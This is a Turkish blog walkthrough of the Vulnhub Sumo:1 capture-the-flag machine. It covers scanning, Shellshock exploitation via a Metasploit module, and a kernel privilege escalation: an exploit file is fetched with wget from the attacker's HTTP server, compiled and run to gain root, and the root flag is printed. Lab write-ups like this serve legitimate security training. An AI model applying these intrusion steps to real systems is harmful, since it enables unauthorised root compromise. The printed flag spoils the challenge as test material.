Vulnhub Sumo1 Writeup

Vulnhub Sumo:1 Writeup

Sumo:1 makinemizin çözümüne başlarken öncelikle ip adresimizi bulalım komutumuz;

sudo netdiscover

İp adresimizi bulduk “192.168.1.104” .Şimdi ip adresimize nmap taraması atalım

sudo nmap -A -p- 192.168.1.104

80 portumuz açık, web servisimize bakalım neler var tarayıcımızdan.

Bir şey çıkmadı kaynak koduna baktığımızda da bir şey bulamadım hemen dirb aracı ile dizin taraması yapalım.

dirb http://192.168.1.104/

cgi-bin ‘i görünce aklıma shellshock zafiyeti olabileceği geldi, nikto ile tarama yapalım hemen.

nikto -h 192.168.1.104

Nikto aracımızın çıktısı. Shellshock için metasploit consoleda bir modül var bunu kullanmayı deneyebiliriz. msfconsole ile başlatalım. Modülümüz “apache_mod_cgi”

search apache_mod_cgi
  1. seçeneği seçeceğiz “use 1 ” ile seçelim ardından ” show options” ile gerekli yerleri dolduralım .

Bağlantı kuruldu, makinemiz arasında.

“Uname -a ” ile makine hakkında bilgi edinelim.

ubuntu 3.2.0-23-generic gördük internetten araştırdığımda exploit buldum hemen deneyelim. Kendi sistemimize indirdim Python ile hedef makineye exploiti indirelim .

python -m SimpleHTTPServer

Http server açtık hedef makinemizden dosyamızı indirelim.

wget http://192.168.1.115:8000/33589.c

Şimdi sırada derleme işlemini yaptıralım, ardından çalıştıralım.

gcc 33589.c -O2 -o expl
./expl 0

Gördüğünüz gibi root olduk şimdi bayrak (flag) arayalım. root dizinine gidelim,

cd /root

Ardından “ls” komutu ile listeleyelim içeridekiler ve karşımıza root.txt çıktı. Dosya içeriğini okuyalım;

cat root.txt

Flag dosyamıza ulaştık ve tüm işlemleri bitirmiş olduk, bir sonraki yazımızda görüşmek üzere.

{Sum0-SunCSR-2020_r001}

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir